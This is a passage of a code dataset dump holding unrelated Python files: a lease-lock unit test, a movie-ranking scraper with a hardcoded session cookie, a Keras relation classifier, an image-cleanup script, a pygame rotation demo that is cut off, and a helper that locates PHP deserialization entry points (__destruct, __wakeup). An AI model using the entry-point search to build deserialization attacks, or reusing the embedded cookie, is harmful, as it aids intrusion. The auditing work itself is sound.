id)\n self.assertEqual(r['id'], lock_id)\n\n r2 = db_locks.acquire_lease(lock_id, id2)\n self.assertIsNone(r2, 'Should have failed to get the lock')\n\n self.assertIsNone(db_locks.release_lease(lock_id, id2, r2['epoch']))\n\n r3 = db_locks.acquire_lease(lock_id, id2)\n self.assertEqual(lock_id, r3['id'], 'Failed to get lock after free')\n\n self.assertIsNone(db_locks.release_lease(r['id'], r['held_by'], r['epoch']))\n self.assertIsNone(db_locks.release_lease(r3['id'], r['held_by'], r['epoch']))\n\n def test_expiration(self):\n lock_id = 'test_lock2'\n id = uuid.uuid4().hex\n id2 = uuid.uuid4().hex\n\n db_locks.init_lease(lock_id)\n\n l = db_locks.acquire_lease(lock_id, id, ttl=1)\n self.assertEqual(lock_id, l['id'])\n\n time.sleep(3)\n\n l2 = db_locks.acquire_lease(lock_id, id2, ttl=100)\n self.assertIsNotNone(l2)\n self.assertEqual(lock_id, l2['id'])\n\n self.assertIsNone(db_locks.release_lease(l2['id'], 
l2['held_by'], l2['epoch']))\n\n def _test_thread_lock(self, t):\n id = uuid.uuid4().hex\n lock_id = 'testlock'\n db_locks.init_lease(lock_id)\n count = 10\n\n r = None\n\n while count > 0:\n inner = 5\n\n while inner > 0:\n r = db_locks.acquire_lease(lock_id, id, ttl=t - 1)\n if not r:\n time.sleep(t)\n inner -= 1\n else:\n break\n\n logger.info('{} Lock: {}'.format(id, r))\n logger.info('Sleeping for {}'.format(t))\n time.sleep(t)\n\n if r:\n db_locks.release_lease(r['id'], r['held_by'], r['epoch'])\n logger.info('{} Lock: {}'.format(id, r))\n\n count -= 1\n\n return 'Complete'\n\n def test_contextmgr(self):\n lockid = 'testlock'\n lockid2= 'test_lock_2'\n db_locks.init_lease(lockid)\n db_locks.init_lease(lockid2)\n with db_locks.least_with_ttl(lockid, 'myid123', ttl=10) as lt:\n print(lt)\n with session_scope() as db:\n print(('{}'.format('\\n'.join([str(x) for x in db.query(Lease).all()]))))\n\n print(lt)\n\n def test_threads(self):\n th = []\n t = ThreadPoolExecutor(max_workers=3)\n th.append(t.submit(self._test_thread_lock, 2))\n th.append(t.submit(self._test_thread_lock, 5))\n th.append(t.submit(self._test_thread_lock, 1))\n\n for thread in th:\n # Wait for completion\n r = thread.result()\n print(('Thread result {}'.format(r)))\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "legacy_test/services/common/test_leases.py", "file_name": "test_leases.py", "file_ext": "py", "file_size_in_byte": 3552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "anchore_engine.subsys.logger.enable_bootstrap_logging", "line_number": 10, "usage_type": "call"}, {"api_name": "anchore_engine.db.initialize", "line_number": 22, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "uuid.uuid1", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 32, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 34, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 34, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 36, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 36, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 39, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 39, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 42, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 42, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 44, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 44, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 47, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 47, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 48, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 48, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 52, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 53, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 55, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 55, 
"usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 57, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 57, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 62, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 62, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 66, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 66, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 69, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 71, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 71, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.acquire_lease", "line_number": 80, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 80, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 87, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 87, "usage_type": "name"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 88, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 88, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks.release_lease", "line_number": 92, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 92, "usage_type": "name"}, {"api_name": "anchore_engine.subsys.logger.info", "line_number": 93, "usage_type": "call"}, {"api_name": "anchore_engine.subsys.logger", "line_number": 93, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 102, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 102, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.init_lease", "line_number": 103, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 103, "usage_type": "name"}, {"api_name": "anchore_engine.db.db_locks.least_with_ttl", "line_number": 104, "usage_type": "call"}, {"api_name": "anchore_engine.db.db_locks", "line_number": 104, "usage_type": "name"}, {"api_name": "anchore_engine.db.session_scope", "line_number": 106, "usage_type": "call"}, {"api_name": "anchore_engine.db.Lease", "line_number": 107, "usage_type": "argument"}, {"api_name": "concurrent.futures.thread.ThreadPoolExecutor", "line_number": 113, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "585382613", "text": "# 使用BeautifulSoup解析网页\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n# bs4是第三方库需要使用pip命令安装\nimport requests\nimport lxml.etree\nimport re\nimport pandas as pd\n\nheader={\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Encoding':'gzip, deflate, br',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Cache-Control':'max-age=0',\n 'Connection':'keep-alive',\n 'Cookie':'__mta=53834519.1583065701340.1583108060211.1583108060676.20; uuid_n_v=v1; uuid=22053C605BB811EA9F0985C24ED856C3328A984601984D769ABA5F0CB37F9375; 
_csrf=ea175c7bf99c2857a14ab1f681c5b2ecda89ad7d289d75398ec75e3be3fced4e; Hm_lvt_703e94591e87be68cc8da0da7cbd0be2=1583065701; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; _lxsdk_cuid=17096119979c8-002e7da7eaa60d-4313f6b-144000-1709611997ac8; mojo-uuid=dd0ebe64e78f7063615ea02b6a1e0aea; __mta=53834519.1583065701340.1583065822531.1583065825533.7; _lxsdk=22053C605BB811EA9F0985C24ED856C3328A984601984D769ABA5F0CB37F9375; Hm_lpvt_703e94591e87be68cc8da0da7cbd0be2=1583108061; _lxsdk_s=17098f889a5-f18-5b8-a84%7C%7C2',\n 'Host':'maoyan.com',\n 'Sec-Fetch-Dest':'document',\n 'Sec-Fetch-Mode':'navigate',\n 'Sec-Fetch-Site':'none',\n 'Sec-Fetch-User':'?1',\n 'Upgrade-Insecure-Requests':'1',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',\n }\n\nmyurl = 'https://maoyan.com/board/4'\n\nresponse = requests.get(myurl,headers=header)\nresponse.encoding ='utf-8'\nbs_info = bs(response.text, 'html.parser')\n\n\n# Python uses for-in style loops; indentation delimits statement blocks\nmyList=[]\nfor tags in bs_info.find_all('div', attrs={'class': 'board-item-content'}):\n for atag in tags.find_all('a'):\n #print(atag.get('href'))\n urls ='https://maoyan.com'+str(atag.get('href'))\n #print(urls)\n # collect all links\n\n response1 = requests.get(urls, headers=header)\n bs_info1 = bs(response1.text, 'html.parser')\n kid = bs_info1.find_all('a', attrs={'class':'text-link'})\n movietype = re.findall(u\"[\\u4e00-\\u9fa5]+\",str(kid)) \n # movie genres\n #print(movietype)\n \n movienames=atag.get('title')\n #print(movienames)\n # get the movie name\n releasetimes= tags.find('p', attrs={'class': 'releasetime'},).text \n #print(releasetimes)\n # get the movie release time\n for btag in tags.find_all('div', attrs={'class':'movie-item-number score-num'}):\n #print(btag.find('i', ).text)\n #print(btag.find('i',attrs={'class': 'fraction'}, ).text)\n sore = str(btag.find('i', ).text)+str(btag.find('i',attrs={'class': 'fraction'}, ).text)\n #print(sore)\n myList.append([urls, movienames, releasetimes, sore, movietype])\n\n\nmovie1 = pd.DataFrame(data = myList)\n\n# Windows needs the gbk charset \nmovie1.to_csv('./movie2.csv', encoding='gbk', index=False, header=False)\n\n\n", "sub_path": "week01/homework_one.py", "file_name": "homework_one.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "263397222", "text": "# coding:utf-8\n\nimport random\nfrom numpy.random import seed\nfrom tensorflow import set_random_seed\n\nseed(1337)\nrandom.seed(1337)\nset_random_seed(1337)\n\nimport numpy as np\nimport tensorflow as tf\n\nimport os\nimport keras\nfrom keras.layers import Dense, Conv1D, Dropout, Input, concatenate, MaxPooling1D, Flatten, LSTM, Bidirectional, \\\n RepeatVector, Reshape, TimeDistributed, Activation, MaxPool1D, Lambda, BatchNormalization\nfrom keras.layers.embeddings import Embedding\nfrom keras.engine.topology import Layer\nfrom keras.layers.merge import concatenate, add, multiply, dot\nfrom keras import Model\nimport sys\n\nsys.path.append(\"..\")\nfrom 
pretreat.semeval_2010 import EMBEDDING_DIM\nfrom pretreat.semeval_2010 import RELATION_COUNT\n\nfrom keras.optimizers import Adadelta, Adam\nfrom keras.optimizers import sgd\nfrom keras.callbacks import Callback\nfrom keras import regularizers\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom comm.scorer import get_marco_f1\nfrom keras.metrics import mean_squared_error, categorical_crossentropy, mse, mae\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU\nfrom comm.piecewise_maxpool import piecewise_maxpool_layer\nfrom keras.utils import multi_gpu_model\nfrom comm.marco_f1 import f1\nfrom keras.constraints import max_norm\n\nPOS_EMBEDDING_DIM = 150\nFIXED_SIZE = 100\n\n\nclass f1_calculator(Callback):\n def __init__(self, index, pos1_index, pos2_index, result):\n self.index = index\n self.result = result\n self.pos1_index = pos1_index\n self.pos2_index = pos2_index\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n predict_result = self.model.predict(x=[self.index, self.pos1_index, self.pos2_index, ])\n f1_score = get_marco_f1(predict_result, self.result)\n self.save_best(f1_score)\n logs[\"f1_score\"] = f1_score\n\n def save_best(self, f1):\n with open(\"/home/zy/git/zy_paper/cnn/simple_best/README\", \"r\") as file:\n best_f1 = file.readline()\n best_f1 = float(best_f1)\n if f1 > best_f1:\n os.system(\"rm /home/zy/git/zy_paper/cnn/simple_best/README\")\n with open(\"/home/zy/git/zy_paper/cnn/simple_best/README\", \"w\") as file:\n file.write(str(f1))\n self.model.save(\"/home/zy/git/zy_paper/cnn/simple_best/simple_cnn.model\")\n\n\nif __name__ == \"__main__\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n os.chdir(\"/home/zy/data/zy_paper/google\")\n train_relative_e1_pos = np.load(\"train_relative_e1_pos_without_indicator.npy\")\n train_relative_e2_pos = np.load(\"train_relative_e2_pos_without_indicator.npy\")\n test_relative_e1_pos = np.load(\"test_relative_e1_pos_without_indicator.npy\")\n test_relative_e2_pos = np.load(\"test_relative_e2_pos_without_indicator.npy\")\n train_labels = np.load(\"train_labels.npy\")\n test_labels = np.load(\"test_labels.npy\")\n # train_e1_pos = np.load(\"train_e1_pos_without_indicator.npy\")\n # train_e2_pos = np.load(\"train_e2_pos_without_indicator.npy\")\n # test_e1_pos = np.load(\"test_e1_pos_without_indicator.npy\")\n # test_e2_pos = np.load(\"test_e2_pos_without_indicator.npy\")\n vec = np.load(\"google_vec.npy\")\n train_index = np.load(\"train_google_without_indicator_index.npy\")\n test_index = np.load(\"test_google_without_indicator_index.npy\")\n\n train_sent = np.load(\"/home/zy/data/zy_paper/bert_large/train.npy\")\n test_sent = np.load(\"/home/zy/data/zy_paper/bert_large/test.npy\")\n\n # index_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n\n sentence_input = Input(shape=(FIXED_SIZE, 1024), dtype=\"float32\")\n\n pos1_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n pos2_input = Input(shape=(FIXED_SIZE,), dtype=\"int32\")\n\n # e1_pos = Input(shape=(1,), dtype=\"int32\")\n # e2_pos = Input(shape=(1,), dtype=\"int32\")\n\n pos1_embedding = Embedding(input_dim=2 * FIXED_SIZE - 1, output_dim=POS_EMBEDDING_DIM, input_length=FIXED_SIZE,\n trainable=True) \\\n (pos1_input)\n\n pos2_embedding = Embedding(input_dim=2 * FIXED_SIZE - 1, output_dim=POS_EMBEDDING_DIM, input_length=FIXED_SIZE,\n trainable=True) \\\n (pos2_input)\n\n pos_embedding = concatenate([pos1_embedding, pos2_embedding], axis=2)\n\n word_embedding = sentence_input\n # word_embedding = Embedding(input_dim=len(vec), 
output_dim=EMBEDDING_DIM, weights=[vec], input_length=FIXED_SIZE,\n # trainable=True)(index_input)\n\n embedding_output = concatenate([word_embedding, pos_embedding], axis=2)\n # embedding_output = add([word_embedding, pos_embedding])\n\n cnn1 = Conv1D(filters=250, kernel_size=2, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn2 = Conv1D(filters=250, kernel_size=3, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn3 = Conv1D(filters=250, kernel_size=4, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n cnn4 = Conv1D(filters=250, kernel_size=5, strides=1, padding=\"same\", activation=\"tanh\")(embedding_output)\n\n cnn_output = concatenate([cnn1, cnn2, cnn3, cnn4], axis=2)\n\n cnn_output = MaxPooling1D(pool_size=FIXED_SIZE, strides=FIXED_SIZE, padding=\"valid\")(cnn_output)\n\n # cnn_output = BatchNormalization()(cnn_output)\n\n cnn_output = Lambda(lambda x: tf.squeeze(x, axis=1))(cnn_output)\n # cnn1 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn1, e1_pos, e2_pos])\n # cnn2 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn2, e1_pos, e2_pos])\n # cnn3 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn3, e1_pos, e2_pos])\n # cnn4 = piecewise_maxpool_layer(filter_num=128, fixed_size=FIXED_SIZE)([cnn4, e1_pos, e2_pos])\n #\n # cnn1 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn1)\n # cnn2 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn2)\n # cnn3 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn3)\n # cnn4 = MaxPooling1D(pool_size=FIXED_SIZE, strides=1, padding=\"same\")(cnn4)\n\n # cnn_output = concatenate([cnn1, cnn2, cnn3, cnn4], axis=1)\n\n # output = Flatten()(cnn_output)\n\n output = Dropout(rate=0.3)(cnn_output)\n\n # output = Dense(128, activation=\"tanh\")(output)\n\n output = Dense(RELATION_COUNT, activation=\"softmax\", kernel_regularizer=keras.regularizers.l2(0.01),\n bias_regularizer=keras.regularizers.l2(0.01))(output)\n\n model = Model(inputs=[sentence_input, pos1_input, pos2_input], outputs=[output])\n\n # model = multi_gpu_model(model, gpus=4)\n\n optimizer = Adam()\n\n model.compile(optimizer=optimizer, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n\n model.fit(x=[train_sent, train_relative_e1_pos, train_relative_e2_pos],\n y=[train_labels],\n validation_data=(\n [test_sent, test_relative_e1_pos, test_relative_e2_pos], [test_labels]),\n batch_size=125,\n epochs=100,\n callbacks=[f1_calculator(test_sent, test_relative_e1_pos, test_relative_e2_pos,\n test_labels),\n ModelCheckpoint(\"simple_cnn.model\", \"f1_score\", 0, True, False, \"max\"),\n EarlyStopping(\"f1_score\", 0.000001, 20, 0, \"max\")\n ]\n )\n", "sub_path": "cnn/cnn_bert.py", "file_name": "cnn_bert.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.set_random_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.callbacks.Callback", "line_number": 45, "usage_type": "name"}, {"api_name": "comm.scorer.get_marco_f1", "line_number": 55, "usage_type": "call"}, {"api_name": 
"comm.marco_f1.f1", "line_number": 63, "usage_type": "name"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "comm.marco_f1.f1", "line_number": 66, "usage_type": "argument"}, {"api_name": "os.environ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 100, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 118, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 119, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling1D", "line_number": 124, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 128, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "pretreat.semeval_2010.RELATION_COUNT", "line_number": 147, "usage_type": "argument"}, {"api_name": "keras.regularizers.l2", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "keras.regularizers.l2", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 148, "usage_type": "attribute"}, {"api_name": "keras.Model", "line_number": 150, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 154, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 166, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "274313814", "text": "'''Delete error images, revise images's model&format'''\r\n\r\n\r\nimport os\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\ndef read_txt(txt_path):\r\n names = []\r\n with open(txt_path,\"r\") as f:\r\n for line in f.readlines()[0:]:\r\n 
pair = line.strip().split()\r\n names.append(pair)\r\n return np.array(names)\r\n\r\ndef loadfiles(filelist):\r\n paths = []\r\n classes = os.listdir(filelist)\r\n for files in classes:\r\n paths.append(filelist + \"/\" + files)\r\n \r\n return np.array(paths)\r\n\r\n\r\n# path_exp = os.path.expanduser(paths)\r\n# classes = os.listdir(path_exp)\r\n# classes.sort()\r\n# nrof_classes = len(classes)\r\n# \r\n## for path in paths.split(':'):\r\n## path_exp = os.path.expanduser(path)\r\n## classes = os.listdir(path_exp)\r\n## classes.sort()\r\n## nrof_classes = len(classes)\r\n# for i in range(nrof_classes):\r\n# class_name = classes[i]\r\n## class_name = classes[1]\r\n# facedir = os.path.join(path_exp, class_name)\r\n# image_paths = get_image_paths(facedir)\r\n# dataset.append(ImageClass(class_name, image_paths))\r\n# \r\n# return dataset\r\n \r\n\r\n\r\n\r\n\r\ndef readimages(path_in):\r\n path_in = path_in + \"/\"\r\n #path_in = 'D:\\\\X\\\\facenet\\\\Generate_AFDB\\\\AFDB\\\\fanglishen\\\\' # input file path\r\n filelist = os.listdir(path_in) # all files in this folder (including subfolders)\r\n # iterate over all files\r\n for files in filelist:\r\n try:\r\n img = Image.open(path_in + files)\r\n # print(img.mode, img.format , files)\r\n\r\n if img.format== \"GIF\" :\r\n img.close()\r\n os.remove(path_in + files)\r\n continue\r\n \r\n if img.format== \"MPO\" :\r\n img.close()\r\n os.remove(path_in + files)\r\n continue\r\n \r\n if (img.size[0]>500)&(img.size[1]>500):\r\n if img.size[0]>img.size[1]:\r\n rate = img.size[0]/500\r\n else:\r\n rate = img.size[1]/500\r\n img_size_1 = int(img.size[0]/rate)\r\n img_size_2 = int(img.size[1]/rate)\r\n img_new = img.resize((img_size_1, img_size_2),Image.ANTIALIAS)\r\n img.close()\r\n os.remove(path_in + files)\r\n img_new.save(path_in + files, format=\"jpeg\")\r\n img = Image.open(path_in + files)\r\n \r\n if (img.mode!=\"RGB\")or(img.format!= \"JPEG\"):\r\n img_new = img.convert(\"RGB\")\r\n img.close()\r\n os.remove(path_in + files)\r\n img_new.save(path_in + files, format=\"jpeg\")\r\n print(\"Renew %s image\" %files)\r\n img = Image.open(path_in + files)\r\n print(img.mode, img.format , files)\r\n img.close()\r\n # print(\"ok\")\r\n\r\n except Exception as e:\r\n print(\"Not an image and delete! 
\")\r\n try:\r\n img.close()\r\n os.remove(path_in + files)\r\n except Exception as e:\r\n os.remove(path_in + files)\r\n continue\r\n \r\ndef check(path_in):\r\n i=0\r\n path_in = path_in + \"/\"\r\n filelist = os.listdir(path_in) \r\n for files in filelist:\r\n img = Image.open((path_in + files))\r\n i=i+1\r\n \r\n print(\"%s %s %s %s\"%(files, img.mode, img.format,i))\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #txt_path = \"D:/X/facenet/Generate_AFDB/name.txt\"\r\n input_path = \"D:/X/facenet/Generate_AFDB/AFDB\"\r\n names = loadfiles(input_path)\r\n \r\n \r\n \r\n \r\n #names = read_txt(txt_path)\r\n for i in range (len(names)):\r\n print(\"Begin to preread %s\" %names[i])\r\n path_in = names[i]\r\n readimages(path_in)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\n#\r\n#\r\n##输出文件的模式和编号\r\n#print(img.mode, img.name)\r\n#\r\n#\r\n##返回文件下所有文件名列表\r\n#imgs = os.listdir(path_dir)\r\n", "sub_path": "Setup_dataset/choose_images_step_1.py", "file_name": "choose_images_step_1.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 55, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 60, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 75, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 84, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 96, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 106, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "371037845", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# 找到所有反序列化的入口点函数\n# PHP中反序列化直接的入口点只有__destruct和__wakeup\n\n# from utils.function import findFuncByContent\n\n# def search_startup(files):\n# \tstart_funcs = {}\n# \tstart_funcnames = [\"__destruct\", \"__wakeup\"]\n\n# \tfor filepath in files:\n# \t\tfor funcname in start_funcnames:\n# \t\t\tfor func in findFuncByContent(funcname, files[filepath]):\n# \t\t\t\tstart_funcs[filepath] = func\n# \treturn start_funcs\n\nimport re\nimport sys\nfrom utils.function import findFuncByKeyword\nfrom utils.parser import parsePHPFile\n\ndef search_startup(files):\n rnt = []\n exec_regex = [\n r\"(?:__destruct|__wakeup)\\(\",\n ]\n for filepath in files:\n parser = parsePHPFile(files[filepath], filepath)\n for regex in exec_regex:\n for class_name in parser.keys():\n for func_name in parser[class_name][\"funcs\"]:\n for t in re.compile(regex, 
re.I).findall(parser[class_name][\"funcs\"][func_name][\"code\"]):\n rnt.append({\"filepath\":filepath, \"func_name\":func_name, \"code\":parser[class_name][\"funcs\"][func_name][\"code\"], \"from\":t})\n return rnt\n", "sub_path": "search/search_startup.py", "file_name": "search_startup.py", "file_ext": "py", "file_size_in_byte": 1190, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.parser.parsePHPFile", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.I", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "572723222", "text": "\"\"\" pixel_array11_rotate.py \"\"\"\nimport sys\nfrom math import radians, cos, sin, floor\nimport pygame\nfrom pygame.locals import QUIT\n\npygame.init()\nSURFACE = pygame.display.set_mode((250, 250))\nFPSCLOCK = pygame.time.Clock()\n\ndef process_pixels(src_data, dst_data):\n \"\"\" process pixels \"\"\"\n angle = radians(45)\n sin_v, cos_v = sin(angle), cos(angle)\n\n for ypos in range(250):\n for xpos in range(250):\n pos_x = xpos - 125\n pos_y = ypos - 125\n x_src = floor((pos_x*cos_v - pos_y*sin_v) + 125)\n y_src = floor((pos_x*sin_v + pos_y*cos_v) + 125)\n\n if 0 <= x_src < 250 and 0 <= y_src < 250:\n val = src_data[x_src][y_src]\n rval, gval, bval, _ = SURFACE.unmap_rgb(val)\n dst_data[xpos][ypos] = (rval, gval, 